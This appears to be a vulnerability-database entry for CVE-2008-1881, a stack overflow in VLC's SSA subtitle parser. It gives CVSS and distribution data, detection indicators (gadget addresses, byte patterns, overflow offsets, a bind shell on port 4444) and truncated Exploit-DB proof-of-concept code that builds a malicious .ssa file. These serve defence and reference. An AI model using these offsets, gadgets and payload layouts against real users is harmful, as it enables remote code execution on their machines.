CVE-2008-1881
Published: 2008-04-17
Priority: P341 · Severity: medium · CVSS 2.0: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Exploit: public exploit available
EPSS: 11.78% (95.6th percentile)
Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c) in VLC 0.8.6e allows remote attackers to execute arbitrary code via a long subtitle in an SSA file. NOTE: this issue is due to an incomplete fix for CVE-2007-6681.
Affected (6 ranges as indexed; duplicate rows collapsed)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | < vlc 0.8.6.e-2.1 (bookworm) | vlc 0.8.6.e-2.1 (bookworm) |
| videolan | vlc | — | — |
| videolan | vlc_media_player | >= 0 < 0.8.6.e-2.1 | 0.8.6.e-2.1 |
Detection & IOCs (extracted from sources)
- command: `Dialogue: <OFFSET1><NOP1><SHELLCODE1><OFFSET2><JMPESP><SHELLCODE1><OFFSET3><JMPBACK><JMPS><SEH>` (layout of the PoC Dialogue line)
- bytes: `\x59\x65\xFE\x62` (little-endian encoding of 0x62FE6559, the JMP ESP gadget in libvlc.dll)
- bytes: `\x66\x14\x40` (little-endian encoding of 0x401466, the POP/POP/RET gadget in vlc.exe)
- bytes: `\xE9\x2E\xCD\xFF\xFF` (0xE9 is an x86 near JMP with a negative displacement, the JMPBACK element above)
- Malicious SSA subtitle files exploit a stack-based buffer overflow in VLC's ParseSSA function; detect anomalously large 'Dialogue:' lines in .ssa files (offsets of 152242+ 'A' bytes observed in the PoC).
- The exploit payload embeds a bind-shell shellcode (LPORT=4444) encoded with PexAlphaNum/alpha_mixed; look for alphanumeric-only shellcode patterns in SSA subtitle content.
- The exploit uses a JMP ESP gadget at 0x62FE6559 inside libvlc.dll and a POP/POP/RET SEH gadget at 0x401466 inside vlc.exe; these addresses can be used as memory-based detection signatures for the specific VLC 0.8.6d/e builds.
- Crafted .avi files paired with malicious .ssa subtitle files are used as the delivery mechanism; both files are created together by the exploit builder.
- SSA exploit files contain the string 'VLC 0.8.6d buffer-overflow' or 'VLC version 8.06' in the Script Info Title field; this can be used as a file-content signature.
- A NOP sled of 16 bytes (\x90*16) precedes the shellcode in the SSA Dialogue field; combined with the large 'A' offset, this pattern is detectable via file scanning.
- CVE-2008-1881 is explicitly noted as an incomplete fix for CVE-2007-6681; the exploit code references CVE-2007-6681 and targets VLC 0.8.6d, while the CVE itself covers VLC 0.8.6e, so detection rules should cover both versions.
- The ROP/JMP gadget addresses (0x62FE6559 in libvlc.dll, 0x401466 in vlc.exe) are version-specific to VLC 0.8.6d builds; they will not match other builds and should not be used as the sole detection mechanism.
- The overflow offset differs between VLC versions: 165254 bytes for 0.8.6c and 165286 bytes for 0.8.6e; detection thresholds for subtitle line length should account for both values.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
| osv | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | MEDIUM | — |
GHSA
GHSA-7fxm-mjcc-cj9m (ghsa_unreviewed · 2022-05-01 · CVSS 7.5 · HIGH · CWE-119): Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c); description as in the CVE text above.
OSV
CVE-2008-1881 (osv · 2008-04-17 · CVSS 7.5 · HIGH): Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c); description as in the CVE text above.
Debian
CVE-2008-1881: vlc (vendor_debian · 2008 · CVSS 7.5 · HIGH): Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c); description as in the CVE text above.
Scope: local
- bookworm: resolved (fixed in 0.8.6.e-2.1)
- bullseye: resolved (fixed in 0.8.6.e-2.1)
- forky: resolved (fixed in 0.8.6.e-2.1)
- sid: resolved (fixed in 0.8.6.e-2.1)
- trixie: resolved (fixed in 0.8.6.e-2.1)
No detection rules found.
Exploit-DB
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal (exploitdb · 2008-05-23 · CVSS 7.5 · HIGH)
---
#!/usr/bin/python
#
# VLC 0.8.6d Double Sh311 Universal Exploit
# CVE-2007-6681
# Vulnerability Discovered by Michal Luczaj
#
# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
# and
# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
# WE CODED IT JUST FOR FUN ;)
# Cheers to #offsec and all our friends :) and prelate_ hehe
#-----------------------------------------------------------------------------
#
# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
#
# matte@badrobot:~$ telnet 192.168.1.245 4444
# Trying 192.168.1.245...
# Connected to 192.168.1.245.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\
Exploit-DB
VideoLAN VLC Media Player 0.8.6e - Subtitle Parsing Local Buffer Overflow (exploitdb · 2008-03-14)
---
/*
VLC
#include
#include
char ssa_header[]=
"[Script Info]\r\n"
"Title: VLC version 8.06.c\r\n");
printf("2> version 8.06.d\r\n");
printf("3> version 8.06.e\r\nChose:");
j=getchar();
switch(j)
{
case '1': k=165254;break;
case '2': printf("\r\nI haven't got this version!\r\n Good Luck :-)");
getchar();
return 0;break;
case '3': k=165286;break;
}
k=k-sizeof(shellcode);
printf("\r\n[+] Creating .ssa file ...");
FILE* f;
char szBuffer[170000];
char szBuffer2[200];
strcpy(szBuffer,ssa_header); // header of ssa
memset((szBuffer+sizeof(ssa_header)-1),'\x90',k);
szBuffer[k+sizeof(ssa_header)]='\x00';
strcpy(szBuffer2,shellcode);
strcat(szBuffer2,szJMP);
strcat(szBuffer,szBuffer2);
f=fopen("Bof-VLC.ssa","wb");
if(f=
No writeups or analysis indexed.
References
- http://aluigi.altervista.org/adv/vlcboffs-adv.txt
- http://aluigi.org/adv/vlcboffs-adv.txt
- http://secunia.com/advisories/28233
- http://secunia.com/advisories/29800
- http://security.gentoo.org/glsa/glsa-200804-25.xml
- http://wiki.videolan.org/Changelog/0.8.6f
- http://www.securityfocus.com/archive/1/489698
- http://www.securityfocus.com/bid/28251
- http://www.securityfocus.com/bid/28274
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41237
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41936
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14872
- https://www.exploit-db.com/exploits/5250